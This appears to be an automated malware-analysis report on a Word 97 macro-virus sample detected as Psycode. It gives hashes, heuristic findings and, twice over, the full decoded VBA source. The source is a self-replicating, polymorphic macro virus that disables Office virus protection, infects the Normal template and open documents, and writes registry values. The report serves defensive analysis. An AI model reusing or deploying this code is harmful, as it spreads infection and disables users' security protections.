Office (OLE) malware analysis — malicious · 79e38121b366c089

MALICIOUS

Office (OLE)

38.5 KB Created: 2000-05-08 10:17:00 Authoring application: Microsoft Word 9.0 First seen: 2015-04-05

MD5: 95bf81e1493bac0576e4020b8f77f494 SHA-1: cd7ddab06cbfe01a020a18150381999ba599a583 SHA-256: 79e38121b366c089f56c00ff1d72745cfd8a3b779fce9cec041405a13782be6a

204 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic macro markers and VBA macros, including AutoOpen and Document_Open, indicating it is designed to execute malicious code upon opening. The macro exhibits self-replication and AV tampering behaviors, suggesting it aims to download and execute a secondary payload. The ClamAV detection of 'Doc.Trojan.Psycode-1' further supports its malicious nature.

Heuristics 7

ClamAV: Doc.Trojan.Psycode-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Psycode-1
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
dc.deletelines 1, dc.countoflines
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Private Sub autoopen(): p2: End Sub
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub document_open(): p2: End Sub
```
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
Private Sub autoclose(): p2: End Sub
```
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3618 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3618 bytes
SHA-256: `4fe4177e494750379ba680522d144c9b9e2030d64b6c6f6dcd1fe716cdae367f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub document_close(): p2: End Sub Private Sub autoclose(): p2: End Sub Private Sub document_open(): p2: End Sub Private Sub autoopen(): p2: End Sub Private Sub p2() Application.ShowVisualBasicEditor = 0: Options.VirusProtection = 0: Application.EnableCancelKey = 0 On Error Resume Next Options.VirusProtection = 0: Application.EnableCancelKey = 0 With NormalTemplate.VBProject.vbcomponents.Item(1).codemodule newcode z = .procstartline("autoexec", 0) Set dc = ActiveDocument.VBProject.vbcomponents.Item(1).codemodule dc.deletelines 1, dc.countoflines dc.addfromstring (.lines(z, z + 13)) r = 1 + Int(Rnd * 2) For x = 0 To 3 dc.addfromstring (.lines((x Xor r) + 1, 1)) Next x .deletelines 1, 4 .addfromstring (dc.lines(1, 3)) .addfromstring (dc.lines(4, 1)) .replaceline .procstartline("extra", 0) + 1, "set dc=activedocument" extra End With dc.replaceline dc.procstartline("autoexec", 0), "private sub p2" 'With ActiveDocument: If Left(.FullName, 2, 1) = ":" Then .SaveAs .FullName: End With End Sub Private Sub newcode() With NormalTemplate.VBProject.vbcomponents.Item(1).codemodule a = Chr(34) z = .procstartline("autoexec", 0) c = (128 + Int(Rnd * 128)) For x = 0 To 3 q = Chr(97 + (x * 5) + Int(Rnd * 5)) .replaceline z + x + 1, q & "=" & a & a u = u & " & " & q Next x .replaceline z + 5, "z=" & Mid(u, 4) .replaceline z + 7, "y = y & chr(asc(mid(z, x, 1)) xor " & c & ")" s = UCase(.lines(1, (z + 12))) .replaceline z + 6, "for x=1 to " & Len(s) For k = 1 To Len(s) t = Mid(s, k, 1) If Asc(t) < 90 And Asc(t) > 65 Then t = Chr(Asc(t) + Int(Rnd * 2) * 32) p = p & t Next k For x = 1 To Len(p): b = b & Chr(Asc(Mid(p, x, 1)) Xor c): Next x For x = 0 To 3 .replaceline z + x + 1, Mid(u, 4 * (x + 1), 1) & "=" & a & Mid(b, (1016 * x) + 1, 1016) & a Next x End With End Sub Private Sub extra() Set dc = ActiveDocument Set dcc = dc.VBProject.vbcomponents For x = 2 To dcc.Count: dcc.Remove dcc.Item(2): Next x With dcc.Item(1).codemodule z = .procstartline("autoexec", 0) For x = z + 5 To z + 12 crap = "" For y = 0 To 20 + Int(Rnd * 30) crap = crap & Chr(32 + Int(Rnd * 224)) Next y .replaceline x, .lines(x, 1) & "'" & crap Next x End With End Sub Private Sub autoexit() newcode With NormalTemplate.VBProject.vbcomponents.Item(1).codemodule .replaceline .procstartline("extra", 0) + 1, "set dc=normaltemplate" extra .deletelines 1, (.procstartline("autoexec", 0) - 1) End With NormalTemplate.Save End Sub Private Sub toolsoptions() Options.VirusProtection = 1 Dialogs(974).Show Options.VirusProtection = 0 End Sub Private Sub toolsmacro() System.PrivateProfileString("", "hkey_local_machine\software\microsoft\windows\currentversion", "ProductID") = "Manche Sachen sind nicht immer wie sie aussehen" End Sub Sub viewvbcode() a = "hkey_current_user\software\microsoft\windows\currentversion\explorer\runmru" System.PrivateProfileString("", a, "a") = "w97m/psycode v2.e2 wed aug 18 99 [swl/lz0/dvc]" System.PrivateProfileString("", a, "mrulist") = "a" End Sub Private Sub autoexec() e = "" j = "" n = "" r = "" z = e & j & n & r For x = 1 To 3365 y = y & Chr(Asc(Mid(z, x, 1)) Xor 183) Next x With NormalTemplate.VBProject.vbcomponents.Item(1).codemodule .deletelines 1, .countoflines: .addfromstring y End With End Sub

SHA-256: 4fe4177e494750379ba680522d144c9b9e2030d64b6c6f6dcd1fe716cdae367f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub document_close(): p2: End Sub
Private Sub autoclose(): p2: End Sub
Private Sub document_open(): p2: End Sub
Private Sub autoopen(): p2: End Sub
Private Sub p2()
Application.ShowVisualBasicEditor = 0: Options.VirusProtection = 0: Application.EnableCancelKey = 0
On Error Resume Next
Options.VirusProtection = 0: Application.EnableCancelKey = 0
With NormalTemplate.VBProject.vbcomponents.Item(1).codemodule
newcode
z = .procstartline("autoexec", 0)
Set dc = ActiveDocument.VBProject.vbcomponents.Item(1).codemodule
dc.deletelines 1, dc.countoflines
dc.addfromstring (.lines(z, z + 13))
r = 1 + Int(Rnd * 2)
For x = 0 To 3
dc.addfromstring (.lines((x Xor r) + 1, 1))
Next x
.deletelines 1, 4
.addfromstring (dc.lines(1, 3))
.addfromstring (dc.lines(4, 1))
.replaceline .procstartline("extra", 0) + 1, "set dc=activedocument"
extra
End With
dc.replaceline dc.procstartline("autoexec", 0), "private sub p2"
'With ActiveDocument: If Left(.FullName, 2, 1) = ":" Then .SaveAs .FullName: End With
End Sub
Private Sub newcode()
With NormalTemplate.VBProject.vbcomponents.Item(1).codemodule
a = Chr(34)
z = .procstartline("autoexec", 0)
c = (128 + Int(Rnd * 128))
For x = 0 To 3
q = Chr(97 + (x * 5) + Int(Rnd * 5))
.replaceline z + x + 1, q & "=" & a & a
u = u & " & " & q
Next x
.replaceline z + 5, "z=" & Mid(u, 4)
.replaceline z + 7, "y = y & chr(asc(mid(z, x, 1)) xor " & c & ")"
s = UCase(.lines(1, (z + 12)))
.replaceline z + 6, "for x=1 to " & Len(s)
For k = 1 To Len(s)
t = Mid(s, k, 1)
If Asc(t) < 90 And Asc(t) > 65 Then t = Chr(Asc(t) + Int(Rnd * 2) * 32)
p = p & t
Next k
For x = 1 To Len(p): b = b & Chr(Asc(Mid(p, x, 1)) Xor c): Next x
For x = 0 To 3
.replaceline z + x + 1, Mid(u, 4 * (x + 1), 1) & "=" & a & Mid(b, (1016 * x) + 1, 1016) & a
Next x
End With
End Sub
Private Sub extra()
Set dc = ActiveDocument
Set dcc = dc.VBProject.vbcomponents
For x = 2 To dcc.Count: dcc.Remove dcc.Item(2): Next x
With dcc.Item(1).codemodule
z = .procstartline("autoexec", 0)
For x = z + 5 To z + 12
crap = ""
For y = 0 To 20 + Int(Rnd * 30)
crap = crap & Chr(32 + Int(Rnd * 224))
Next y
.replaceline x, .lines(x, 1) & "'" & crap
Next x
End With
End Sub
Private Sub autoexit()
newcode
With NormalTemplate.VBProject.vbcomponents.Item(1).codemodule
.replaceline .procstartline("extra", 0) + 1, "set dc=normaltemplate"
extra
.deletelines 1, (.procstartline("autoexec", 0) - 1)
End With
NormalTemplate.Save
End Sub
Private Sub toolsoptions()
Options.VirusProtection = 1
Dialogs(974).Show
Options.VirusProtection = 0
End Sub
Private Sub toolsmacro()
System.PrivateProfileString("", "hkey_local_machine\software\microsoft\windows\currentversion", "ProductID") = "Manche Sachen sind nicht immer wie sie aussehen"
End Sub
Sub viewvbcode()
a = "hkey_current_user\software\microsoft\windows\currentversion\explorer\runmru"
System.PrivateProfileString("", a, "a") = "w97m/psycode v2.e2 wed aug 18 99 [swl/lz0/dvc]"
System.PrivateProfileString("", a, "mrulist") = "a"
End Sub
Private Sub autoexec()
e = ""
j = ""
n = ""
r = ""
z = e & j & n & r
For x = 1 To 3365
y = y & Chr(Asc(Mid(z, x, 1)) Xor 183)
Next x
With NormalTemplate.VBProject.vbcomponents.Item(1).codemodule
.deletelines 1, .countoflines: .addfromstring y
End With
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.